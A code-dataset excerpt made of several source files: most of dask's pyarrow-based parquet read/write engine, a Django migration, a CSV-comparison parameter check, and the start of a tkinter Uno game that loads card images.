pyarrow's `write_to_dataset`\n once ARROW-8244 is addressed.\n \"\"\"\n fs.mkdirs(root_path, exist_ok=True)\n\n df = table.to_pandas(ignore_metadata=True)\n index_cols = list(index_cols) if index_cols else []\n preserve_index = False\n if index_cols and preserve_ind_supported:\n df.set_index(index_cols, inplace=True)\n preserve_index = True\n\n partition_keys = [df[col] for col in partition_cols]\n data_df = df.drop(partition_cols, axis=\"columns\")\n data_cols = 
df.columns.drop(partition_cols)\n if len(data_cols) == 0 and not index_cols:\n raise ValueError(\"No data left to save outside partition columns\")\n\n subschema = table.schema\n for col in table.schema.names:\n if col in partition_cols:\n subschema = subschema.remove(subschema.get_field_index(col))\n\n md_list = []\n for keys, subgroup in data_df.groupby(partition_keys):\n if not isinstance(keys, tuple):\n keys = (keys,)\n subdir = fs.sep.join(\n [\n \"{colname}={value}\".format(colname=name, value=val)\n for name, val in zip(partition_cols, keys)\n ]\n )\n subtable = pa.Table.from_pandas(\n subgroup, preserve_index=preserve_index, schema=subschema, safe=False\n )\n prefix = fs.sep.join([root_path, subdir])\n fs.mkdirs(prefix, exist_ok=True)\n full_path = fs.sep.join([prefix, filename])\n with fs.open(full_path, \"wb\") as f:\n pq.write_table(subtable, f, metadata_collector=md_list, **kwargs)\n md_list[-1].set_file_path(fs.sep.join([subdir, filename]))\n\n return md_list\n\n\ndef _index_in_schema(index, schema):\n if index and schema is not None:\n # Make sure all index columns are in user-defined schema\n return len(set(index).intersection(schema.names)) == len(index)\n elif index:\n return True # Schema is not user-specified, all good\n else:\n return False # No index to check\n\n\ndef _get_dataset_object(paths, fs, filters, dataset_kwargs):\n \"\"\"Generate a ParquetDataset object\"\"\"\n kwargs = dataset_kwargs.copy()\n if \"validate_schema\" not in kwargs:\n kwargs[\"validate_schema\"] = False\n if len(paths) > 1:\n # This is a list of files\n base, fns = _analyze_paths(paths, fs)\n proxy_metadata = None\n if \"_metadata\" in fns:\n # We have a _metadata file. PyArrow cannot handle\n # \"_metadata\" when `paths` is a list. So, we shuld\n # open \"_metadata\" separately.\n paths.remove(fs.sep.join([base, \"_metadata\"]))\n fns.remove(\"_metadata\")\n with fs.open(fs.sep.join([base, \"_metadata\"]), mode=\"rb\") as fil:\n proxy_metadata = pq.ParquetFile(fil).metadata\n # Create our dataset from the list of data files.\n # Note #1: that this will not parse all the files (yet)\n # Note #2: Cannot pass filters for legacy pyarrow API (see issue#6512).\n # We can handle partitions + filtering for list input after\n # adopting new pyarrow.dataset API.\n dataset = pq.ParquetDataset(paths, filesystem=fs, **kwargs)\n if proxy_metadata:\n dataset.metadata = proxy_metadata\n elif fs.isdir(paths[0]):\n # This is a directory. We can let pyarrow do its thing.\n # Note: In the future, it may be best to avoid listing the\n # directory if we can get away with checking for the\n # existence of _metadata. Listing may be much more\n # expensive in storage systems like S3.\n allpaths = fs.glob(paths[0] + fs.sep + \"*\")\n base, fns = _analyze_paths(allpaths, fs)\n dataset = pq.ParquetDataset(paths[0], filesystem=fs, filters=filters, **kwargs)\n else:\n # This is a single file. No danger in gathering statistics\n # and/or splitting row-groups without a \"_metadata\" file\n base = paths[0]\n fns = [None]\n dataset = pq.ParquetDataset(paths[0], filesystem=fs, **kwargs)\n\n return dataset, base, fns\n\n\ndef _gather_metadata(\n paths, fs, split_row_groups, gather_statistics, filters, dataset_kwargs\n):\n \"\"\"Gather parquet metadata into a single data structure.\n\n Use _metadata or aggregate footer metadata into a single\n object. Also, collect other information necessary for\n parquet-to-ddf mapping (e.g. 
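# _write_partitioned above names each partition directory "col=value"
# (hive style) from the groupby keys. The naming scheme in miniature,
# pandas only; paths are illustrative:
import pandas as pd

df = pd.DataFrame({"year": [2020, 2020, 2021], "v": [1, 2, 3]})
for keys, group in df.groupby(["year"]):
    if not isinstance(keys, tuple):  # older pandas yields scalar keys
        keys = (keys,)
    subdir = "/".join("{}={}".format(c, k) for c, k in zip(["year"], keys))
    print(subdir, len(group))  # year=2020 2, then year=2021 1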
schema, partition_info).\n \"\"\"\n\n # Step 1: Create a ParquetDataset object\n dataset, base, fns = _get_dataset_object(paths, fs, filters, dataset_kwargs)\n if fns == [None]:\n # This is a single file. No danger in gathering statistics\n # and/or splitting row-groups without a \"_metadata\" file\n if gather_statistics is None:\n gather_statistics = True\n if split_row_groups is None:\n split_row_groups = True\n\n # Step 2: Construct necessary (parquet) partitioning information\n partition_info = {\"partitions\": None, \"partition_keys\": {}, \"partition_names\": []}\n fn_partitioned = False\n if dataset.partitions is not None:\n fn_partitioned = True\n partition_info[\"partition_names\"] = [\n n for n in dataset.partitions.partition_names if n is not None\n ]\n partition_info[\"partitions\"] = dataset.partitions\n for piece in dataset.pieces:\n partition_info[\"partition_keys\"][piece.path] = piece.partition_keys\n\n # Step 3: Construct a single `metadata` object. We can\n # directly use dataset.metadata if it is available.\n # Otherwise, if `gather_statistics` or `split_row_groups`,\n # we need to gether the footer metadata manually\n metadata = None\n if dataset.metadata:\n # We have a _metadata file.\n # PyArrow already did the work for us\n schema = dataset.metadata.schema.to_arrow_schema()\n if gather_statistics is None:\n gather_statistics = True\n if split_row_groups is None:\n split_row_groups = True\n return (\n schema,\n dataset.metadata,\n base,\n partition_info,\n split_row_groups,\n gather_statistics,\n )\n else:\n # No _metadata file.\n # May need to collect footer metadata manually\n if dataset.schema is not None:\n schema = dataset.schema.to_arrow_schema()\n else:\n schema = None\n if gather_statistics is None:\n gather_statistics = False\n if split_row_groups is None:\n split_row_groups = False\n metadata = None\n if not (split_row_groups or gather_statistics):\n # Don't need to construct real metadata if\n # we are not gathering statistics or splitting\n # by row-group\n metadata = [p.path for p in dataset.pieces]\n if schema is None:\n schema = dataset.pieces[0].get_metadata().schema.to_arrow_schema()\n return (\n schema,\n metadata,\n base,\n partition_info,\n split_row_groups,\n gather_statistics,\n )\n # We have not detected a _metadata file, and the user has specified\n # that they want to split by row-group and/or gather statistics.\n # This is the only case where we MUST scan all files to collect\n # metadata.\n for piece, fn in zip(dataset.pieces, fns):\n md = piece.get_metadata()\n if schema is None:\n schema = md.schema.to_arrow_schema()\n if fn_partitioned:\n md.set_file_path(piece.path.replace(base + fs.sep, \"\"))\n elif fn:\n md.set_file_path(fn)\n if metadata:\n _append_row_groups(metadata, md)\n else:\n metadata = md\n return (\n schema,\n metadata,\n base,\n partition_info,\n split_row_groups,\n gather_statistics,\n )\n\n\ndef _generate_dd_meta(schema, index, categories, partition_info):\n partition_obj = partition_info[\"partitions\"]\n partitions = partition_info[\"partition_names\"]\n columns = None\n\n has_pandas_metadata = schema.metadata is not None and b\"pandas\" in schema.metadata\n\n if has_pandas_metadata:\n pandas_metadata = json.loads(schema.metadata[b\"pandas\"].decode(\"utf8\"))\n (\n index_names,\n column_names,\n storage_name_mapping,\n column_index_names,\n ) = _parse_pandas_metadata(pandas_metadata)\n if categories is None:\n categories = []\n for col in pandas_metadata[\"columns\"]:\n if (col[\"pandas_type\"] == \"categorical\") and 
(\n col[\"name\"] not in categories\n ):\n categories.append(col[\"name\"])\n else:\n # No pandas metadata implies no index, unless selected by the user\n index_names = []\n column_names = schema.names\n storage_name_mapping = {k: k for k in column_names}\n column_index_names = [None]\n\n if index is None and index_names:\n index = index_names\n\n if set(column_names).intersection(partitions):\n raise ValueError(\n \"partition(s) should not exist in columns.\\n\"\n \"categories: {} | partitions: {}\".format(column_names, partitions)\n )\n\n column_names, index_names = _normalize_index_columns(\n columns, column_names + partitions, index, index_names\n )\n\n all_columns = index_names + column_names\n\n # Check that categories are included in columns\n if categories and not set(categories).intersection(all_columns):\n raise ValueError(\n \"categories not in available columns.\\n\"\n \"categories: {} | columns: {}\".format(categories, list(all_columns))\n )\n\n dtypes = _get_pyarrow_dtypes(schema, categories)\n dtypes = {storage_name_mapping.get(k, k): v for k, v in dtypes.items()}\n\n index_cols = index or ()\n meta = _meta_from_dtypes(all_columns, dtypes, index_cols, column_index_names)\n meta = clear_known_categories(meta, cols=categories)\n\n if partition_obj:\n for partition in partition_obj:\n if isinstance(index, list) and partition.name == index[0]:\n # Index from directory structure\n meta.index = pd.CategoricalIndex(\n categories=partition.keys, name=index[0]\n )\n elif partition.name == meta.index.name:\n # Index created from a categorical column\n meta.index = pd.CategoricalIndex(\n categories=partition.keys, name=meta.index.name\n )\n elif partition.name in meta.columns:\n meta[partition.name] = pd.Series(\n pd.Categorical(categories=partition.keys, values=[]),\n index=meta.index,\n )\n\n return meta, index_cols, categories, index\n\n\ndef _aggregate_stats(\n file_path, file_row_group_stats, file_row_group_column_stats, stat_col_indices\n):\n \"\"\"Utility to aggregate the statistics for N row-groups\n into a single dictionary.\n \"\"\"\n if len(file_row_group_stats) < 1:\n # Empty statistics\n return {}\n elif len(file_row_group_column_stats) == 0:\n assert len(file_row_group_stats) == 1\n return file_row_group_stats[0]\n else:\n # Note: It would be better to avoid df_rgs and df_cols\n # construction altogether. 
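# _aggregate_stats above reduces per-row-group statistics to one summary per
# file: sums for row counts and byte sizes, min of mins, max of maxes. The
# reduction in plain Python:
row_groups = [
    {"num-rows": 10, "min": 0, "max": 5, "null_count": 1},
    {"num-rows": 12, "min": 2, "max": 9, "null_count": 0},
]
summary = {
    "num-rows": sum(rg["num-rows"] for rg in row_groups),
    "min": min(rg["min"] for rg in row_groups),
    "max": max(rg["max"] for rg in row_groups),
    "null_count": sum(rg["null_count"] for rg in row_groups),
}
print(summary)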
It makes it fast to aggregate\n # the statistics for many row groups, but isn't\n # worthwhile for a small number of row groups.\n if len(file_row_group_stats) > 1:\n df_rgs = pd.DataFrame(file_row_group_stats)\n s = {\n \"file_path_0\": file_path,\n \"num-rows\": df_rgs[\"num-rows\"].sum(),\n \"total_byte_size\": df_rgs[\"total_byte_size\"].sum(),\n \"columns\": [],\n }\n else:\n s = {\n \"file_path_0\": file_path,\n \"num-rows\": file_row_group_stats[0][\"num-rows\"],\n \"total_byte_size\": file_row_group_stats[0][\"total_byte_size\"],\n \"columns\": [],\n }\n\n df_cols = None\n if len(file_row_group_column_stats) > 1:\n df_cols = pd.DataFrame(file_row_group_column_stats)\n for ind, name in enumerate(stat_col_indices):\n i = ind * 3\n if df_cols is None:\n s[\"columns\"].append(\n {\n \"name\": name,\n \"min\": file_row_group_column_stats[0][i],\n \"max\": file_row_group_column_stats[0][i + 1],\n \"null_count\": file_row_group_column_stats[0][i + 2],\n }\n )\n else:\n s[\"columns\"].append(\n {\n \"name\": name,\n \"min\": df_cols.iloc[:, i].min(),\n \"max\": df_cols.iloc[:, i + 1].max(),\n \"null_count\": df_cols.iloc[:, i + 2].sum(),\n }\n )\n return s\n\n\ndef _process_metadata(\n metadata, single_rg_parts, gather_statistics, stat_col_indices, no_filters\n):\n # Get the number of row groups per file\n file_row_groups = defaultdict(list)\n file_row_group_stats = defaultdict(list)\n file_row_group_column_stats = defaultdict(list)\n cmax_last = {}\n for rg in range(metadata.num_row_groups):\n row_group = metadata.row_group(rg)\n fpath = row_group.column(0).file_path\n if fpath is None:\n raise ValueError(\n \"Global metadata structure is missing a file_path string. \"\n \"If the dataset includes a _metadata file, that file may \"\n \"have one or more missing file_path fields.\"\n )\n if file_row_groups[fpath]:\n file_row_groups[fpath].append(file_row_groups[fpath][-1] + 1)\n else:\n file_row_groups[fpath].append(0)\n if gather_statistics:\n if single_rg_parts:\n s = {\n \"file_path_0\": fpath,\n \"num-rows\": row_group.num_rows,\n \"total_byte_size\": row_group.total_byte_size,\n \"columns\": [],\n }\n else:\n s = {\n \"num-rows\": row_group.num_rows,\n \"total_byte_size\": row_group.total_byte_size,\n }\n cstats = []\n for name, i in stat_col_indices.items():\n column = row_group.column(i)\n if column.statistics:\n cmin = column.statistics.min\n cmax = column.statistics.max\n cnull = column.statistics.null_count\n last = cmax_last.get(name, None)\n if no_filters:\n # Only think about bailing if we don't need\n # stats for filtering\n if cmin is None or (last and cmin < last):\n # We are collecting statistics for divisions\n # only (no filters) - Column isn't sorted, or\n # we have an all-null partition, so lets bail.\n #\n # Note: This assumes ascending order.\n #\n gather_statistics = False\n file_row_group_stats = {}\n file_row_group_column_stats = {}\n break\n\n if single_rg_parts:\n to_ts = column.statistics.logical_type.type == \"TIMESTAMP\"\n s[\"columns\"].append(\n {\n \"name\": name,\n \"min\": cmin if not to_ts else pd.Timestamp(cmin),\n \"max\": cmax if not to_ts else pd.Timestamp(cmax),\n \"null_count\": cnull,\n }\n )\n else:\n cstats += [cmin, cmax, cnull]\n cmax_last[name] = cmax\n else:\n\n if no_filters and column.num_values > 0:\n # We are collecting statistics for divisions\n # only (no filters) - Lets bail.\n gather_statistics = False\n file_row_group_stats = {}\n file_row_group_column_stats = {}\n break\n\n if single_rg_parts:\n s[\"columns\"].append({\"name\": 
name})\n else:\n cstats += [None, None, None]\n if gather_statistics:\n file_row_group_stats[fpath].append(s)\n if not single_rg_parts:\n file_row_group_column_stats[fpath].append(tuple(cstats))\n\n return (\n file_row_groups,\n file_row_group_stats,\n file_row_group_column_stats,\n gather_statistics,\n )\n\n\ndef _construct_parts(\n fs,\n metadata,\n schema,\n filters,\n index_cols,\n data_path,\n partition_info,\n categories,\n split_row_groups,\n gather_statistics,\n):\n \"\"\"Construct ``parts`` for ddf construction\n\n Use metadata (along with other data) to define a tuple\n for each ddf partition. Also gather statistics if\n ``gather_statistics=True``, and other criteria is met.\n \"\"\"\n\n parts = []\n stats = []\n\n partition_keys = partition_info[\"partition_keys\"]\n partition_obj = partition_info[\"partitions\"]\n\n # Check if `metadata` is just a list of paths\n # (not splitting by row-group or collecting statistics)\n if isinstance(metadata, list) and isinstance(metadata[0], str):\n for full_path in metadata:\n part = {\n \"piece\": (full_path, None, partition_keys.get(full_path, None)),\n \"kwargs\": {\"partitions\": partition_obj, \"categories\": categories},\n }\n parts.append(part)\n return parts, stats\n\n # Determine which columns need statistics\n flat_filters = (\n set(flatten(tuple(flatten(filters, container=list)), container=tuple))\n if filters\n else []\n )\n stat_col_indices = {}\n for i, name in enumerate(schema.names):\n if name in index_cols or name in flat_filters:\n stat_col_indices[name] = i\n stat_cols = list(stat_col_indices.keys())\n gather_statistics = gather_statistics and len(stat_cols) > 0\n\n # Convert metadata into simple dictionary structures\n (\n file_row_groups,\n file_row_group_stats,\n file_row_group_column_stats,\n gather_statistics,\n ) = _process_metadata(\n metadata,\n int(split_row_groups) == 1,\n gather_statistics,\n stat_col_indices,\n flat_filters == [],\n )\n\n if split_row_groups:\n # Create parts from each file,\n # limiting the number of row_groups in each piece\n split_row_groups = int(split_row_groups)\n for filename, row_groups in file_row_groups.items():\n row_group_count = len(row_groups)\n for i in range(0, row_group_count, split_row_groups):\n i_end = i + split_row_groups\n rg_list = row_groups[i:i_end]\n full_path = (\n fs.sep.join([data_path, filename])\n if filename != \"\"\n else data_path # This is a single file\n )\n pkeys = partition_keys.get(full_path, None)\n if partition_obj and pkeys is None:\n continue # This partition was filtered\n part = {\n \"piece\": (full_path, rg_list, pkeys),\n \"kwargs\": {\n \"partitions\": partition_obj,\n \"categories\": categories,\n \"filters\": filters,\n \"schema\": schema,\n },\n }\n parts.append(part)\n if gather_statistics:\n stat = _aggregate_stats(\n filename,\n file_row_group_stats[filename][i:i_end],\n file_row_group_column_stats[filename][i:i_end],\n stat_col_indices,\n )\n stats.append(stat)\n else:\n for filename, row_groups in file_row_groups.items():\n full_path = (\n fs.sep.join([data_path, filename])\n if filename != \"\"\n else data_path # This is a single file\n )\n pkeys = partition_keys.get(full_path, None)\n if partition_obj and pkeys is None:\n continue # This partition was filtered\n rgs = None\n part = {\n \"piece\": (full_path, rgs, pkeys),\n \"kwargs\": {\n \"partitions\": partition_obj,\n \"categories\": categories,\n \"filters\": filters,\n \"schema\": schema,\n },\n }\n parts.append(part)\n if gather_statistics:\n stat = _aggregate_stats(\n filename,\n 
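# _construct_parts above slices each file's row-group list into chunks of
# split_row_groups, one output partition per chunk. The slicing idiom alone:
row_groups = list(range(7))
split = 3
chunks = [row_groups[i:i + split] for i in range(0, len(row_groups), split)]
print(chunks)  # [[0, 1, 2], [3, 4, 5], [6]]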
file_row_group_stats[filename],\n file_row_group_column_stats[filename],\n stat_col_indices,\n )\n stats.append(stat)\n\n return parts, stats\n\n\nclass ArrowEngine(Engine):\n @classmethod\n def read_metadata(\n cls,\n fs,\n paths,\n categories=None,\n index=None,\n gather_statistics=None,\n filters=None,\n split_row_groups=None,\n **kwargs,\n ):\n\n # Check if we are using pyarrow.dataset API\n dataset_kwargs = kwargs.get(\"dataset\", {})\n\n # Gather necessary metadata information. This includes\n # the schema and (parquet) partitioning information.\n # This may also set split_row_groups and gather_statistics,\n # depending on _metadata availability.\n (\n schema,\n metadata,\n base_path,\n partition_info,\n split_row_groups,\n gather_statistics,\n ) = _gather_metadata(\n paths, fs, split_row_groups, gather_statistics, filters, dataset_kwargs\n )\n\n # Process metadata to define `meta` and `index_cols`\n meta, index_cols, categories, index = _generate_dd_meta(\n schema, index, categories, partition_info\n )\n\n # Cannot gather_statistics if our `metadata` is a list\n # of paths, or if we are building a multiindex (for now).\n # We also don't \"need\" to gather statistics if we don't\n # want to apply any filters or calculate divisions\n if (isinstance(metadata, list) and isinstance(metadata[0], str)) or len(\n index_cols\n ) > 1:\n gather_statistics = False\n elif filters is None and len(index_cols) == 0:\n gather_statistics = False\n\n # Make sure gather_statistics allows filtering\n # (if filters are desired)\n if filters:\n # Filters may require us to gather statistics\n if gather_statistics is False and partition_info[\"partition_names\"]:\n warnings.warn(\n \"Filtering with gather_statistics=False. \"\n \"Only partition columns will be filtered correctly.\"\n )\n elif gather_statistics is False:\n raise ValueError(\"Cannot apply filters with gather_statistics=False\")\n elif not gather_statistics:\n gather_statistics = True\n\n # Finally, construct our list of `parts`\n # (and a corresponing list of statistics)\n parts, stats = _construct_parts(\n fs,\n metadata,\n schema,\n filters,\n index_cols,\n base_path,\n partition_info,\n categories,\n split_row_groups,\n gather_statistics,\n )\n\n return (meta, stats, parts, index)\n\n @classmethod\n def read_partition(\n cls,\n fs,\n piece,\n columns,\n index,\n categories=(),\n partitions=(),\n filters=None,\n schema=None,\n **kwargs,\n ):\n if isinstance(index, list):\n for level in index:\n # unclear if we can use set ops here. 
I think the order matters.\n # Need the membership test to avoid duplicating index when\n # we slice with `columns` later on.\n if level not in columns:\n columns.append(level)\n\n # Ensure `columns` and `partitions` do not overlap\n columns_and_parts = columns.copy()\n if columns_and_parts and partitions:\n for part_name in partitions.partition_names:\n if part_name in columns:\n columns.remove(part_name)\n else:\n columns_and_parts.append(part_name)\n columns = columns or None\n\n if isinstance(piece, str):\n # `piece` is a file-path string\n path = piece\n row_group = None\n partition_keys = None\n else:\n # `piece` contains (path, row_group, partition_keys)\n (path, row_group, partition_keys) = piece\n\n if not isinstance(row_group, list):\n row_group = [row_group]\n\n dfs = []\n for rg in row_group:\n piece = pq.ParquetDatasetPiece(\n path,\n row_group=rg,\n partition_keys=partition_keys,\n open_file_func=partial(fs.open, mode=\"rb\"),\n )\n arrow_table = cls._parquet_piece_as_arrow(\n piece, columns, partitions, **kwargs\n )\n df = cls._arrow_table_to_pandas(arrow_table, categories, **kwargs)\n\n if len(row_group) > 1:\n dfs.append(df)\n\n if len(row_group) > 1:\n df = pd.concat(dfs)\n\n # Note that `to_pandas(ignore_metadata=False)` means\n # pyarrow will use the pandas metadata to set the index.\n index_in_columns_and_parts = set(df.index.names).issubset(\n set(columns_and_parts)\n )\n if not index:\n if index_in_columns_and_parts:\n # User does not want to set index and a desired\n # column/partition has been set to the index\n df.reset_index(drop=False, inplace=True)\n else:\n # User does not want to set index and an\n # \"unwanted\" column has been set to the index\n df.reset_index(drop=True, inplace=True)\n else:\n if set(df.index.names) != set(index) and index_in_columns_and_parts:\n # The wrong index has been set and it contains\n # one or more desired columns/partitions\n df.reset_index(drop=False, inplace=True)\n elif index_in_columns_and_parts:\n # The correct index has already been set\n index = False\n columns_and_parts = list(\n set(columns_and_parts).difference(set(df.index.names))\n )\n df = df[list(columns_and_parts)]\n\n if index:\n df = df.set_index(index)\n return df\n\n @classmethod\n def _arrow_table_to_pandas(\n cls, arrow_table: pa.Table, categories, **kwargs\n ) -> pd.DataFrame:\n _kwargs = kwargs.get(\"arrow_to_pandas\", {})\n _kwargs.update({\"use_threads\": False, \"ignore_metadata\": False})\n\n return arrow_table.to_pandas(categories=categories, **_kwargs)\n\n @classmethod\n def _parquet_piece_as_arrow(\n cls, piece: pq.ParquetDatasetPiece, columns, partitions, **kwargs\n ) -> pa.Table:\n arrow_table = piece.read(\n columns=columns,\n partitions=partitions,\n use_pandas_metadata=True,\n use_threads=False,\n **kwargs.get(\"read\", {}),\n )\n return arrow_table\n\n @staticmethod\n def initialize_write(\n df,\n fs,\n path,\n append=False,\n partition_on=None,\n ignore_divisions=False,\n division_info=None,\n schema=None,\n index_cols=None,\n **kwargs,\n ):\n # Infer schema if \"infer\"\n # (also start with inferred schema if user passes a dict)\n if schema == \"infer\" or isinstance(schema, dict):\n\n # Start with schema from _meta_nonempty\n _schema = pa.Schema.from_pandas(\n df._meta_nonempty.set_index(index_cols)\n if index_cols\n else df._meta_nonempty\n )\n\n # Use dict to update our inferred schema\n if isinstance(schema, dict):\n schema = pa.schema(schema)\n for name in schema.names:\n i = _schema.get_field_index(name)\n j = 
schema.get_field_index(name)\n _schema = _schema.set(i, schema.field(j))\n\n # If we have object columns, we need to sample partitions\n # until we find non-null data for each column in `sample`\n sample = [col for col in df.columns if df[col].dtype == \"object\"]\n if schema_field_supported and sample and schema == \"infer\":\n delayed_schema_from_pandas = delayed(pa.Schema.from_pandas)\n for i in range(df.npartitions):\n # Keep data on worker\n _s = delayed_schema_from_pandas(\n df[sample].to_delayed()[i]\n ).compute()\n for name, typ in zip(_s.names, _s.types):\n if typ != \"null\":\n i = _schema.get_field_index(name)\n j = _s.get_field_index(name)\n _schema = _schema.set(i, _s.field(j))\n sample.remove(name)\n if not sample:\n break\n\n # Final (inferred) schema\n schema = _schema\n\n dataset = fmd = None\n i_offset = 0\n if append and division_info is None:\n ignore_divisions = True\n fs.mkdirs(path, exist_ok=True)\n\n if append:\n try:\n # Allow append if the dataset exists.\n # Also need dataset.metadata object if\n # ignore_divisions is False (to check divisions)\n dataset = pq.ParquetDataset(path, filesystem=fs)\n if not dataset.metadata and not ignore_divisions:\n # TODO: Be more flexible about existing metadata.\n raise NotImplementedError(\n \"_metadata file needed to `append` \"\n \"with `engine='pyarrow'` \"\n \"unless `ignore_divisions` is `True`\"\n )\n fmd = dataset.metadata\n except (IOError, ValueError, IndexError):\n # Original dataset does not exist - cannot append\n append = False\n if append:\n names = dataset.metadata.schema.names\n has_pandas_metadata = (\n dataset.schema.to_arrow_schema().metadata is not None\n and b\"pandas\" in dataset.schema.to_arrow_schema().metadata\n )\n if has_pandas_metadata:\n pandas_metadata = json.loads(\n dataset.schema.to_arrow_schema().metadata[b\"pandas\"].decode(\"utf8\")\n )\n categories = [\n c[\"name\"]\n for c in pandas_metadata[\"columns\"]\n if c[\"pandas_type\"] == \"categorical\"\n ]\n else:\n categories = None\n dtypes = _get_pyarrow_dtypes(dataset.schema.to_arrow_schema(), categories)\n if set(names) != set(df.columns) - set(partition_on):\n raise ValueError(\n \"Appended columns not the same.\\n\"\n \"Previous: {} | New: {}\".format(names, list(df.columns))\n )\n elif (pd.Series(dtypes).loc[names] != df[names].dtypes).any():\n # TODO Coerce values for compatible but different dtypes\n raise ValueError(\n \"Appended dtypes differ.\\n{}\".format(\n set(dtypes.items()) ^ set(df.dtypes.iteritems())\n )\n )\n i_offset = len(dataset.pieces)\n\n if division_info[\"name\"] not in names:\n ignore_divisions = True\n if not ignore_divisions:\n old_end = None\n row_groups = [\n dataset.metadata.row_group(i)\n for i in range(dataset.metadata.num_row_groups)\n ]\n for row_group in row_groups:\n for i, name in enumerate(names):\n if name != division_info[\"name\"]:\n continue\n column = row_group.column(i)\n if column.statistics:\n if not old_end:\n old_end = column.statistics.max\n else:\n old_end = max(old_end, column.statistics.max)\n break\n\n divisions = division_info[\"divisions\"]\n if divisions[0] < old_end:\n raise ValueError(\n \"Appended divisions overlapping with the previous ones\"\n \" (set ignore_divisions=True to append anyway).\\n\"\n \"Previous: {} | New: {}\".format(old_end, divisions[0])\n )\n\n return fmd, schema, i_offset\n\n @staticmethod\n def write_partition(\n df,\n path,\n fs,\n filename,\n partition_on,\n return_metadata,\n fmd=None,\n compression=None,\n index_cols=None,\n schema=None,\n **kwargs,\n ):\n 
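# initialize_write above refuses to append when the new frame's dtypes differ
# from the existing dataset's. The comparison step in isolation (string
# dtype names stand in for the real pyarrow-derived dtypes):
import pandas as pd

existing = pd.Series({"a": "int64", "b": "object"})
new = pd.DataFrame({"a": [1], "b": ["x"]})
if (existing.loc[["a", "b"]] != new[["a", "b"]].dtypes.astype(str)).any():
    raise ValueError("Appended dtypes differ.")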
_meta = None\n preserve_index = False\n if _index_in_schema(index_cols, schema):\n df.set_index(index_cols, inplace=True)\n preserve_index = True\n else:\n index_cols = []\n t = pa.Table.from_pandas(df, preserve_index=preserve_index, schema=schema)\n if partition_on:\n md_list = _write_partitioned(\n t,\n path,\n filename,\n partition_on,\n fs,\n index_cols=index_cols,\n compression=compression,\n **kwargs,\n )\n if md_list:\n _meta = md_list[0]\n for i in range(1, len(md_list)):\n _append_row_groups(_meta, md_list[i])\n else:\n md_list = []\n with fs.open(fs.sep.join([path, filename]), \"wb\") as fil:\n pq.write_table(\n t,\n fil,\n compression=compression,\n metadata_collector=md_list,\n **kwargs,\n )\n if md_list:\n _meta = md_list[0]\n _meta.set_file_path(filename)\n # Return the schema needed to write the metadata\n if return_metadata:\n return [{\"schema\": t.schema, \"meta\": _meta}]\n else:\n return []\n\n @staticmethod\n def write_metadata(parts, fmd, fs, path, append=False, **kwargs):\n if parts:\n if not append:\n # Get only arguments specified in the function\n common_metadata_path = fs.sep.join([path, \"_common_metadata\"])\n keywords = getargspec(pq.write_metadata).args\n kwargs_meta = {k: v for k, v in kwargs.items() if k in keywords}\n with fs.open(common_metadata_path, \"wb\") as fil:\n pq.write_metadata(parts[0][0][\"schema\"], fil, **kwargs_meta)\n\n # Aggregate metadata and write to _metadata file\n metadata_path = fs.sep.join([path, \"_metadata\"])\n if append and fmd is not None:\n _meta = fmd\n i_start = 0\n else:\n _meta = parts[0][0][\"meta\"]\n i_start = 1\n for i in range(i_start, len(parts)):\n _append_row_groups(_meta, parts[i][0][\"meta\"])\n with fs.open(metadata_path, \"wb\") as fil:\n _meta.write_metadata_file(fil)\n","sub_path":"dask/dataframe/io/parquet/arrow.py","file_name":"arrow.py","file_ext":"py","file_size_in_byte":38459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"454977448","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.utils.timezone import utc\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('loginapp', '0024_auto_20150603_1700'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userprofile',\n name='photo',\n field=models.FileField(blank=True, upload_to='photos/%Y/%m/%d', null=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='date_joined',\n field=models.DateTimeField(verbose_name='date joined', default=datetime.datetime(2015, 6, 3, 18, 45, 16, 636876, tzinfo=utc)),\n ),\n ]\n","sub_path":"backend/swapstersio/loginapp/migrations/0025_auto_20150603_1845.py","file_name":"0025_auto_20150603_1845.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"229261346","text":"from csv_comparison_package.error_handler import AppErrorHandler\nfrom csv_comparison_package.field import Field\n\n\ndef check_for_empty_value(comparator):\n \"\"\" Check for parameters that can not have empty value\"\"\"\n for key_val in comparator.default_schema:\n is_key_available = all([key_val[Field.prm_required.value],\n key_val[Field.prm_name.value] in comparator.parameters,\n key_val[Field.prm_default_value.value] is None])\n\n if is_key_available:\n is_value_blank = comparator.parameters[key_val[Field.prm_name.value]] == \\\n Field.empty_string.value\n if is_value_blank:\n raise 
AppErrorHandler(AppErrorHandler.invalid_value)\n","sub_path":"csv_comparison_package/input_validator/__check_for_empty_value.py","file_name":"__check_for_empty_value.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"78992650","text":"from tkinter import *\r\nfrom random import choice\r\nfrom PIL import Image, ImageTk\r\n\r\ncol = \"lightgoldenrodyellow\"\r\n\r\nroot = Tk()\r\nroot.geometry(\"1500x750\")\r\nroot.resizable(False, False)\r\nroot.wm_attributes('-transparentcolor', \"orange\")\r\nroot.configure(bg=col)\r\nroot.title(\"Uno 2.0\")\r\n\r\nfolder = \"Revamped Uno_Assets\"\r\n\r\nimages = {\r\n \"Red\": ImageTk.PhotoImage(Image.open(f\"{folder}/Red.png\").convert(\"RGBA\").rotate(45)),\r\n \"Green\": ImageTk.PhotoImage(Image.open(f\"{folder}/Green.png\").convert(\"RGBA\").rotate(45)),\r\n \"Yellow\": ImageTk.PhotoImage(Image.open(f\"{folder}/Yellow.png\").convert(\"RGBA\").rotate(45)),\r\n \"Blue\": ImageTk.PhotoImage(Image.open(f\"{folder}/Blue.png\").convert(\"RGBA\").rotate(45)),\r\n \"Deck\": ImageTk.PhotoImage(file=f\"{folder}/Deck.png\"), # Deck image (for drawing cards)\r\n \"UNO\": ImageTk.PhotoImage(file=f\"{folder}/Logo.png\"), # big sign\r\n \"UNO_Button\": ImageTk.PhotoImage(file=f\"{folder}/UnoButton.png\"),\r\n \"Start\": ImageTk.PhotoImage(file=f\"{folder}/startButton.png\")\r\n }\r\n\r\nbgCols = {\r\n \"Red\": \"#802019\",\r\n 